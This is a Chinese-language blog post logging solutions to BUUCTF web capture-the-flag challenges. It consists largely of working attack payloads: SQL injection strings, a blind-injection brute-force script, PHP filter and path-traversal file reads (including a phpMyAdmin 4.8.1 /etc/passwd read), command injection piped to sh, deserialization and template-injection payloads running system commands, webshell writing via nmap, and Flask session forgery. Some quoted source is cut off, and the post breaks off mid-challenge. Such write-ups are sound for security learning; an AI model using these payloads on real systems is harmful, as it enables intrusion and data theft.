xiaolong22333

BUUCTF刷题记录(持续更新中~)

之前陆陆续续做过一些题，但都没有记录，这次打算巩固一下，记录下来。

文章目录

- - [HCTF 2018]WarmUp
  - [极客大挑战 2019]EasySQL
  - [强网杯 2019]随便注
  - [极客大挑战 2019]Havefun
  - [SUCTF 2019]EasySQL
  - [ACTF2020 新生赛]Include
  - [极客大挑战 2019]Secret File
  - [极客大挑战 2019]LoveSQL
  - [GXYCTF2019]Ping Ping Ping
  - [ACTF2020 新生赛]Exec
  - [极客大挑战 2019]Knife
  - [护网杯 2018]easy_tornado
  - [RoarCTF 2019]Easy Calc
  - [极客大挑战 2019]Http
  - [极客大挑战 2019]PHP
  - [极客大挑战 2019]Upload
  - [极客大挑战 2019]BabySQL
  - [ACTF2020 新生赛]Upload
  - [ACTF2020 新生赛]BackupFile
  - [HCTF 2018]admin
  - [极客大挑战 2019]BuyFlag
  - [BJDCTF2020]Easy MD5
  - [SUCTF 2019]CheckIn
  - [ZJCTF 2019]NiZhuanSiWei
  - [CISCN2019 华北赛区 Day2 Web1]Hack World
  - [极客大挑战 2019]HardSQL
  - [网鼎杯 2018]Fakebook
  - [GXYCTF2019]BabySQli
  - [网鼎杯 2020 青龙组]AreUSerialz
  - [MRCTF2020]你传你呢
  - [GYCTF2020]Blacklist
  - [MRCTF2020]Ez_bypass
  - [强网杯 2019]高明的黑客(不会)
  - [BUUCTF 2018]Online Tool
  - [RoarCTF 2019]Easy Java(不会)
  - [GXYCTF2019]BabyUpload
  - [GXYCTF2019]禁止套娃
  - [GWCTF 2019]我有一个数据库
  - [BJDCTF2020]The mystery of ip
  - [BJDCTF2020]Mark loves cat
  - [BJDCTF2020]ZJCTF，不过如此
  - [安洵杯 2019]easy_web
  - [网鼎杯 2020 朱雀组]phpweb
  - [De1CTF 2019]SSRF Me(不会)
  - [NCTF2019]Fake XML cookbook
  - [ASIS 2019]Unicorn shop
  - [BJDCTF2020]Cookie is so stable
  - [CISCN 2019 初赛]Love Math
  - [BSidesCF 2020]Had a bad day
  - [SUCTF 2019]Pythonginx
  - [安洵杯 2019]easy_serialize_php
  - [0CTF 2016]piapiapia
  - [WesternCTF2018]shrine
  - [SWPU2019]Web1
  - [WUSTCTF2020]朴实无华
  - [网鼎杯 2020 朱雀组]Nmap
  - [MRCTF2020]PYWebsite
  - [极客大挑战 2019]FinalSQL
  - [NPUCTF2020]ReadlezPHP
  - [BJDCTF2020]EasySearch
  - [MRCTF2020]Ezpop
  - [NCTF2019]True XML cookbook
  - [GYCTF2020]FlaskApp
  - [CISCN2019 华北赛区 Day1 Web2]ikun(不会)
  - [CISCN2019 华东南赛区]Web11
  - [CISCN2019 华北赛区 Day1 Web1]Dropbox
  - [BSidesCF 2019]Futurella
  - [GWCTF 2019]枯燥的抽奖(打不开)
  - [MRCTF2020]套娃
  - [极客大挑战 2019]RCE ME
  - [WUSTCTF2020]颜值成绩查询
  - [BSidesCF 2019]Kookie

[HCTF 2018]WarmUp

"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "
";
    }  
?>

最终目标是要利用include包含ffffllllaaaagggg，想执行include就需要

(! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file']))

这三项都为true
! empty($_REQUEST['file'])只要输入了就为true
is_string($_REQUEST['file'])需要输入的是字符串才为true
emmm::checkFile($_REQUEST['file'])是重点，它调用了emm类中的checkFile方法，输入的参数需要满足白名单也就是source.php或者hint.php，并且得包含?，所以payload为

source.php?file=hint.php?/../../../../../../ffffllllaaaagggg

[极客大挑战 2019]EasySQL

随便试了一下，秒了
username=admin' or 1=1--+&password='

[强网杯 2019]随便注

很经典的一题，堆叠注入，后面还有它的变种：[GYCTF2020]Blacklist

(查库)
1';show databases;#
(查表)
1';show tables;#
(查列)
1';show columns from `words`;
1';show columns from `1919810931114514`;

解法1
发现1919810931114514表中有flag，而words表中则是id和data，也就是说它原本是读取words表中的内容，我们只需要把words换成1919810931114514，将id列换成flag列就能读取flag了，

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` change flag id varchar(100);#

然后再1'or 1=1#就有flag了

解法2
预处理

比如
set @xl='1919810931114514';		存储表名
set @sql=concat('select * from',@xl);	存储sql语句
char(115,101,108,101,99,116)		select
prepare xiaolong from @sql;		预定义sql语句
execute xiaolong;			执行预定义sql语句

测试发现还有strstr函数，大小写绕过即可

1';SET @sql=concat(char(115,101,108,101,99,116),'* from `1919810931114514`');PREPARE xiaolong from @sql;execute xiaolong;

解法3
用handler代替select

1';handler `1919810931114514`open; handler `1919810931114514` read first;

这也是后面一变种题的解法

[极客大挑战 2019]Havefun

傻逼题

?cat=dog

[SUCTF 2019]EasySQL

搜wp时发现

在oracle 缺省支持通过 ‘ || ’ 来实现字符串拼接，但在mysql 缺省不支持。需要调整mysql 的sql_mode
模式：pipes_as_concat 来实现oracle 的一些功能

1;set sql_mode=PIPES_AS_CONCAT;select 1

非预期

*,1

[ACTF2020 新生赛]Include

php伪协议读文件

?file=php://filter/read=convert.base64-encode/resource=flag.php

[极客大挑战 2019]Secret File

抓包发现secr3t.php
php伪协议

?file=php://filter/read=convert.base64-encode/resource=flag.php

[极客大挑战 2019]LoveSQL

username=admin'or '1'='1&password=1

登陆后得到密码916ac54a426380d931b6d858656a9090，但没有flag
尝试报错注入

username=admin
password=916ac54a426380d931b6d858656a9090'and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

916ac54a426380d931b6d858656a9090'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='geek'),0x7e),1)#
916ac54a426380d931b6d858656a9090'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'),0x7e),1)#
916ac54a426380d931b6d858656a9090'and updatexml(1,concat(0x7e,(select group_concat(password) from l0ve1ysq1),0x7e),1)#

但updatexml()查询的字符串长度最大为32，所以还要用substr函数来截取
不过其实没这么麻烦，直接联合查询就行

'union select 1,2,group_concat(password) from l0ve1ysq1#

[GXYCTF2019]Ping Ping Ping

解法1：字符串拼接

?ip=127.0.0.1;s=g;cat$IFS$9fla$s.php

解法2：base64编码

?ip=127.0.0.1;echo$IFS$9Y2F0IGZsYWcucGhw|base64$IFS$9-d|sh

cat flag.php的base64编码为Y2F0IGZsYWcucGhw
echo$IFS$9Y2F0IGZsYWcucGhw的结果为Y2F0IGZsYWcucGhw
echo$IFS$9Y2F0IGZsYWcucGhw|base64$IFS$9-d的结果为cat flag.php
再加上|sh就是执行前面的cat flag.php

解法3：内联执行

?ip=127.0.0.1;cat$IFS$9`ls`

[ACTF2020 新生赛]Exec

127.0.0.1&cat /flag

[极客大挑战 2019]Knife

菜刀或蚁剑连接

[护网杯 2018]easy_tornado

hint.txt
md5(cookie_secret+md5(filename))

如果直接改文件名去访问flag就会跳转到这个页面

error?msg=error

结合题目，应该是要模板注入找到cookie_secret
在handler.settings可以找到cookie_secret，这没用过还真不知道

file?filename=/fllllllllllllag&filehash=665a7d61f98ceaa33fc5a07c266c4fc7

[RoarCTF 2019]Easy Calc

php特性
变量名中有空白符->删除空白符
变量名中有特殊字符->转化为下划线
所以传空格num即可绕过黑名单
然后用scandir列出文件

?%20num=print_r(scandir(chr(47)));	#chr(47)代表/

file_get_contents读取f1agg

file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103));

[极客大挑战 2019]Http

源码中有Secret.php，我眼拙没看见，跟个傻逼一样扫了半天
依次修改3个http头

Referer
X-Forwarded-For
User-Agent

[极客大挑战 2019]PHP

www.zip得到源码
最简单的反序列化
属性个数的值大于实际属性个数，跳过 __wakeup()函数的执行

payload:

index.php?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

注意是private声明，所以多了%00

[极客大挑战 2019]Upload

上传.phtml文件

Content-Type: image/png
Content-Type: image/jpg
Content-Type: image/gif
这3种都可以

记得文件内容加上GIF98A

[极客大挑战 2019]BabySQL

双写绕过

'uniunionon selselectect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#
'uniunionon selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables wherwheree table_schema='ctf'#
'uniunionon selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns wherwheree table_name='Flag'#
'uniunionon selselectect 1,2,group_concat(flag) frfromom ctf.Flag#

[ACTF2020 新生赛]Upload

上传,phtml文件

[ACTF2020 新生赛]BackupFile

备份文件泄露
访问index.php.bak

 
  因为是弱等于，所以在进行数字与字符串的判断时会先将字符串转成数字 
  index.php/?key=123
 
   
  [HCTF 2018]admin 
  考验一点代码审计
 解法1：弱口令 
  username:admin
password:123
 
  可能是出题人想让我们知道弱口令的重要性吧，不然可就太弱智了~ 
  解法2：unicode欺骗
 在改密码界面查看源代码可看到题目的源码地址，下载下来进行审计
 
 在注册这里有个strlower函数 
   
   strlower():它将字符串中的所有大写字母转换为小写字母，并返回一个新字符串 
   
  但碰到unicode编码例如ᴬᴰᴹᴵᴺ则会转化为ADMIN
 接着看，在登陆处和改变密码处同样用到了strlower
  
  
 所以思路如下：首先注册时username填ᴬᴰᴹᴵᴺ，这时会调用strlower，于是就注册了一个username为ADMIN的用户，之后再用ᴬᴰᴹᴵᴺ进行登陆，又调用strlower，就能以ADMIN登陆，然后再改密码再一次调用strlower，把ADMIN变成了admin，这就达到了改admin密码的效果 
  ᴬᴰᴹᴵᴺ——>ADMIN——>admin
 
  unicode 
  解法3：flask session伪造 
  代码审计仔细点可以发现
 
 只需伪造flask-session就可以了，而想要破解session还需要SECRET_KEY
 结果发现可以找到
 
 好的，可以搬出脚本伪造session了 
  解密 
  python flask_session_cookie_manager3.py decode -c ".eJxF0EFrgz
AYxvGvMnLuYab1IvTQEhtSeF9xxJbkUjZnp29MB2pRU_rdJ73s-Fx-8Pwf7HLtqr5mydDdqxW7NN8sebC3L5YwK9QI1NbZuZiNP7XADy1SPpqwC4aOPjubAFptUMOEsogMuQi99YYUNwFbS260Mo3A2xoFTCAgAO0b5JZA5xx4ERutIuCKg_9whsrFXrYoYktHsmJPIOoGw6mG4GYUB5dJNVmfv4MsZpQqQp2uDaVb9lyxsu-ul-HXVbf_CzINmWidpTJkEtYYfrjRJlifxobqhXcjEjagXQweZivydbbbvrjbp68WYqj6ga3Yva-6VxwWbdjzDwKAZio.YGdC4w.UuujSbZ57GYUFlR44TrsYon-QIs" -s "ckj123"
{'_fresh': True, '_id': b'd2029a9e2bee3ae640c03b2f9f31285314e5b956ffb26c3ef90da52fa43103320b7fc1463e9a253b62ddb70c25059f2cd0c08b75a39241d8b1fd40e24b5517b1', 'csrf_token': b'da389df738c7786a63fa9b8c09063b1992c2d478', 'name': 'test', 'user_id': '14'}
 
  将name替换成admin后加密 
  python flask_session_cookie_manager3.py encode -t "{'_fresh':
True, '_id': b'd2029a9e2bee3ae640c03b2f9f31285314e5b956ffb26c3ef90da52fa43103320b7fc1463e9a253b62ddb70c25059f2cd0c08b75a39241d8b1fd40e24b5517b1', 'csrf_token': b'da389df738c7786a63fa9b8c09063b1992c2d478', 'name': 'admin', 'user_id': '14'}" -s "ckj123"
.eJxF0MGKwjAUheFXGbJ2MY12I7hQUkOEe0uHVLnZiKN12pvGgarURnz3KW5meTYfnP8p9ueuutZifuvu1UTsm5OYP8XHt5gLp0wP3Nb5rhwobFuQ6xa56CkuI_Em5DuKYM0MLTxQlwmxTzC4QGwkRWwd-97pLIHgalTwAAUReNWgdAy2kCDLlKxJQBoJ4csTH0d73KpMHW_YqRWDqhuM2xqiH1Ctfa7Nw4XiE3Q5oDYJ2mxKnC3EayKO1-68v_366vJ_QWcxV613fIy5hinGH0mWogtZSlyPvO-RsQHrUwgwOFVM8-XizV0OoRqJwyk0FzER92vVveuIZCZef2iJZnM.YGdGhg.ZnzMLxyduFAyIf_LJLSFpIWGNmQ
 
   
  
 脚本地址
 https://github.com/noraj/flask-session-cookie-manager 
   
  [极客大挑战 2019]BuyFlag 
  
 
  cookie中user改为1
 password=404a
 money用数组绕过或科学计数法 
   
  [BJDCTF2020]Easy MD5 
  抓包发现hint
  
  用ffifdyop绕过MD5 
  然后进入levels91.php 
  
 
  数组绕过
 进入levell14.php 
   
 
  依旧数组绕过 
   
  [SUCTF 2019]CheckIn 
  上传图片马，文件头加上GIF89A来绕过
 上传.user.ini，内容为 
  auto_prepend_file=2.jpg
 
  相当于文件头加上 include(“2.jpg”)
 同样加上GIF89A绕过 
  访问 
  /uploads/d99081fe929b750e0557f85e6499103f/index.php
 
   
   
  [ZJCTF 2019]NiZhuanSiWei 
  ".file_get_contents($text,'r')."

";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>
 
  text用data协议或php://input写入welcome to the zjctf
 file用php伪协议读取useless.php 
   
  //useless.php
file)){  
            echo file_get_contents($this->file); 
            echo "
";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  
 
  反序列化读取flag.php 
  file)){
            echo file_get_contents($this->file);
            echo "
";
        return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
$p=new Flag();
echo serialize($p);
?>
 
  最后的payload记得把file的值改成useless.php 
   
   
  [CISCN2019 华北赛区 Day2 Web1]Hack World 
  初步测试了一下，过滤了好多，空格、or、and、#、；select等等
 尝试了一下后发现可以盲注
  
  写个脚本跑一下(不会对分，跑的巨慢。。。) 
  import requests
import time
url='http://15abf97a-073f-4075-9700-3267a740f3e0.node3.buuoj.cn/index.php'
flag=""
payload={
    "id" : ""
}
for i in range(0,60):
    for j in range(1,127):
        payload["id"]="1^if(ascii(substr((select(flag)from(flag)),%d,1))=%d,0,1)"%(i,j)
        r = requests.post(url,data=payload)
        time.sleep(0.01)
        if 'Hello' in r.text:
            flag = flag+chr(j)
            print(flag)
            break
print(flag)
 
   
  [极客大挑战 2019]HardSQL 
  报错注入，且过滤了空格,= 
  'or(updatexml(1,concat(0x7e,(select(database())),0x7e),1))#
'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek'))),0x7e),1))#
'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1'))),0x7e),1))#
'or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1))#
 
  括号太多了，人都绕傻了 
   
  [网鼎杯 2018]Fakebook 
  解法1：
 联合注入或报错注入+ssrf+反序列化
 这waf挺怪的，只需把union和select之间的空格改成/**/就能绕过 
  no=0 union/**/select 1,database(),3,4
no=0 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema ='fakebook'
no=0 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name ='users'
no=0 union/**/select 1,group_concat(data),3,4 from users
 
  data中数据如下
 O:8:"UserInfo":3:{s:4:"name";s:8:"xiaolong";s:3:"age";i:1;s:4:"blog";s:25:"https://xiaolong22333.top";}
 然后查看robots.txt，发现源码
 结合data数据及题目，应该是反序列化+ssrf 
  O:8:"UserInfo":3:{s:4:"name";s:8:"xiaolong";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
 
  payload: 
  ?no=0%20union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:8:"xiaolong";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
 
  这里说一下为什么在blog处存在ssrf，网上的文章好像都没说，泄露的user.php也没解释
 在注册时blog写真实的网站，这里我写了我的blog地址 
  系统真的去访问了填的的这个blog，也就是说这里可能是这样的 
  url=https://xiaolong22333.top
 
  这是典型的ssrf
 在user.php中如下代码就是调用blog的url去访问
  
  解法2：
 通过load_file()函数+报错注入直接读取flag.php 
  1 and(updatexml(1,concat(1,(select(LOAD_FILE('/var/www/html/flag.php')))),1))
1 and(updatexml(1,concat(1,right((select(LOAD_FILE('/var/www/html/flag.php'))),32)),1))
 
   
  [GXYCTF2019]BabySQli 
  随便输一下，发现源码中有提示，先base32在base64解码得 
  select * from user where username = '$name'
 
  mysql在查询没有的数据时会构建一个虚拟的表
 
 也就是说我们查询一个user为admin,pw为123的用户时就创建了这个用户
 这题有一个坑点，就是密码是经过MD5加密的，这。。。反正我是想不到 
  1'union select 1,'admin','202cb962ac59075b964b07152d234b70'#
 
  123MD5后为202cb962ac59075b964b07152d234b70 
   
  [网鼎杯 2020 青龙组]AreUSerialz 
  打开一看，有点吓人，但其实很简单
 利用点在这段代码 
  private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }
 
  可以用php伪协议读取flag.php 
  
 
  ?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}
 
   
  [MRCTF2020]你传你呢 
  先传.htaccess文件，再传图片马，最后蚁剑连接
 但我做的时候一直出问题，图片不解析成php，明明是同样的步骤，同样的代码，但就是不同的结果，很难受。
 这里我放个网上的wp
 [MRCTF2020]你传你呢 
   
  [GYCTF2020]Blacklist 
  [强网杯 2019]随便注的变种，在此基础上还过滤了set|prepare|alter|rename| 
  1';show tables;找到表名FlagHere
 用handler进行查询 
  1';handler FlagHere open; handler FlagHere read first;
 
   
  [MRCTF2020]Ez_bypass 
  没什么好说的 
  ?id[]=1&gg[]=2
post
passwd=1234567a
 
   
  [强网杯 2019]高明的黑客(不会) 
  完全就是考察代码编写能力，不会，告辞 
   
  [BUUCTF 2018]Online Tool 
  
 
  PHP escapeshellarg()+escapeshellcmd() 之殇
  
  escapeshellarg:将参数中的字符串两侧加上',并将其中的'进行转义 然后在两侧加上'达到拼接的目的
escapeshellcmd:将参数中的字符串中间的特殊字符转义,并且将落单的'进行转义
nmap命令中 有一个参数-oG可以实现将命令和结果写到文件
 
  我们需要的语句是这样的 
   -oG shell.php
 
  但经过escapeshellarg后变成了 
  ' -oG shell.php'
 
  这样就变成了字符串，无法执行命令了
 而如果我们输入的是这样的呢 
  ' -oG shell.php'
 
  进过escapeshellarg后变成 
  ''\'' -oG shell.php'\'''
 
  然后再经过escapeshellcmd后 
  ''\\'' -oG shell.php'\\'''
 
  拼接上去后相当于 
  nmap -T5 -sT -Pn --host-timeout 2 -F \ -oG shell.php\\
 
  但这样文件就会变成shell.php\\，且前面还会被转义
 所以需要加个空格，前后各一个
 payload 
  ?host='  -oG shell.php '
 
  回显了文件夹名字，加上木马的文件名后连接蚁剑即可 
   
  [RoarCTF 2019]Easy Java(不会) 
  知识盲区，虽然操作简单，但完全不明白，正在学java，等学了一段时间再回来看看
 先放上大佬的wp
 RoarCTF2019web题-easy_java writeup 
   
  [GXYCTF2019]BabyUpload 
  传.hatccess文件和图片马，和MRCTF那题一样 
   
  [GXYCTF2019]禁止套娃 
  .git泄露，直接GitHack读取源码 
  ";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦！");
            }
        }
        else{
            die("再好好想想！");
        }
    }
    else{
        die("还想读flag，臭弟弟！");
    }
}
// highlight_file(__FILE__);
?>
 
  需要传入无参数的命令，无参数文件读取 
  ?exp=print_r(scandir(current(localeconv())));
 
   
  然后array_reverse逆转数组，next()函数进行下一个值的读取 
  ?exp=print_r(next(array_reverse(scandir(current(localeconv())))));
 
   
  读取flag.php 
  ?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
 
   
  [GWCTF 2019]我有一个数据库 
  robots.txt中有phpinfo.php，不过好像没啥用
 dirsearch能扫出phpadmin(我扫不出来。。。很难受) 
  访问发现版本为4.8.1，搜索发现有任意文件包含漏洞，试试payload 
  /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../etc/passwd
 
  尝试读取flag 
  /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../flag
 
   
  [BJDCTF2020]The mystery of ip 
  结合hint.php中Do you know why i know your ip?和题目，猜测是X-Forwarded-For有问题
 添加后测试发现存在模板注入 
  X-Forwarded-For: {
    {system('cat /flag')}}
 
   
  [BJDCTF2020]Mark loves cat 
  猜测是.git源码泄露，拿出GitHack，结果下了些没用的文件，还以为做错了，看wp发现就是这么做，但我就是没有下载到flag.php和index.php，emmm,一定是buu的锅。 
   $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){	
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){	
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){	
    exit($is);
}

echo "the flag is: ".$flag;
 
  直接说payload 
  get传参 yds=flag；
或者
get传参 is=flag&flag=flag
 
  先说第一种，经过第一个foreach后 
  foreach($_GET as $x => $y){
    $$x = $$y;
}
 
  变成了$yds=$flag，满足第二个if语句(参数中没有flag)，输出$yds，也就是$flag 
  第二种，还是经过这个foreach,变成了$ls=$flag，然后进入第三个foreach，变成了$flag=$flag，此时满足第三个if，输出$is，也就是$flag
 这两种做法都没有用到post，当然有的wp中是get+post，有点绕，我实在是搞不明白，研究了一个多小时快搞吐了，太傻逼了。 
   
  [BJDCTF2020]ZJCTF，不过如此 
  首先跟zjctf那题一样，data写入或input写入，伪协议读文件 
  ?text=data://text/plain,I have a dream&file=php://filter/read=convert.base64-encode/resource=next.php
 
   $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}
 
  preg_replace的/e模式可以执行代码，也就是我们要传入的是：参数名为正则表达式，参数值为要匹配的字符串。
 知识点放上，wp放上，payload放上
 深入研究preg_replace与代码执行
 wp
 payload: 
  /next.php?\S*=${getFlag()}&cmd=system('cat /flag');	#\S 在php正则表达式中示意匹配所有非空字符，*示意多次匹配
 
  ps:最新版的php移除了preg_replace的/e模式 
   
  [安洵杯 2019]easy_web 
  url的参数值看着像base64，尝试去解密，然后就遇到了一个很坑的地方，我一直解密的那个网站这串base64没解出来，当时就想当然以为可能不是base64，结果就完全不知道要怎么做了。看了wp知道这tm就是base64，我换个解密网站就出来了。所以说
 解不出来换个网站，多试几次！！！
 解不出来换个网站，多试几次！！！
 解不出来换个网站，多试几次！！！
 回到题目，经过两次base64后16进制转字符串，得到555.png，那换成flag.php看看，反过来转16进制再base64加密两次
 
 看来不行，那换成index.php，可以base64解密后读到源码 
  ';
    die("xixi～ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "";
    echo "
";
}
echo $cmd;
echo "
";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "
";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>





 
  MD5强类型比较，找MD5一样的就行 
  a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
 
  cmd用\绕过 
  cmd=ca\t /flag
 
   
  [网鼎杯 2020 朱雀组]phpweb 
  打开题目发现输出了当前时间，抓包看看
  
  发现两个参数，应该是调用了call_user_func，那尝试读一下源码 
  func=file_get_contents&p=index.php
 
  func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>
 
  可以反序列化执行命令 
  func=unserialize&p=O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}
 
  居然没有flag文件，那搜一下flag在哪 
  func=unserialize&p=O:4:"Test":2:{s:1:"p";s:17:"find / -name fla*";s:4:"func";s:6:"system";}
 
  
 好家伙，藏在这里，读flag 
  func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
 
   
  [De1CTF 2019]SSRF Me(不会) 
  python的flask，看不懂，不会 
   
  [NCTF2019]Fake XML cookbook 
  最简单的xxe
 抓包，增加外部实体 
  
 ]>
&goodies;123456
 
   
   
  [ASIS 2019]Unicorn shop 
  unicode编码安全
 买4号马就能得到flag，但只能输入一个字符，找个大于1337的unicode字符就行，比如ↈ(代表100000)
 实际上中文的万，亿，兆也都可以 
   
  [BJDCTF2020]Cookie is so stable 
  输入7*7，发现回显为49，应该是Twig的模板注入(Jinja的话为7777777)，登陆后抓包，发现user在cookie处，根据提示，注入点为cookie处
 根据这篇文章的payload拿flag 
  {
    {_self.env.registerUndefinedFilterCallback("exec")}}{
    {_self.env.getFilter("cat /flag")}}
 
   
   
  [CISCN 2019 初赛]Love Math 
  = 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}
 
  我们想要的结果 
  c=system('cat /flag')
 
  但要绕过函数名的限制
 利用php中字符串加上括号可被当作函数执行的特性 
  c=$_GET[a]($_GET[b])&a=system&b=cat /flag
 
  所以现在得想办法构造_GET，下面要用到这些函数
 base_convert进制转换
 dechex10进制转16进制
 hex2bin16进制转字符串
 但我们没有hex2bin函数，需要构造 
  base_convert(37907361743,10,36)=>hex2bin	//把10进制的37907361743转为36进制，即为hex2bin
 
  dechex(1598506324)=>"5f474554"
hex2bin("5f474554")=>_GET
 
  即这么一串等于_GET 
  base_convert(37907361743,10,36)(dechex(1598506324))
 
  然后将这串保存到一个白名单变量中以防太长，同时用{}代替[] 
  c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{pi}($$pi{abs})
 
  分号后面那串就等于$_GET{pi}($_GET{abs})
 最终payload： 
  c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{pi}($$pi{abs})&pi=system&abs=cat /flag
 
  yu师傅的wp 
   
  [BSidesCF 2020]Had a bad day 
  尝试php伪协议读文件，发现去掉php后缀可以成功 
  ?category=php://filter/read=convert.base64-encode/resource=index
 
  
 
  发现只有参数中带有woofers，meowers，index就可以包含
 这里有个知识点，php伪协议可以套一层协议，比如convert.base64-encode/index/resource
 所以可以这样 
  ?category=php://filter/read=convert.base64-encode/index/resource=flag
 
  或者还可以 
  ?category=php://filter/read=convert.base64-encode/index/resource=index/../flag
 
   
  [SUCTF 2019]Pythonginx 
          @app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
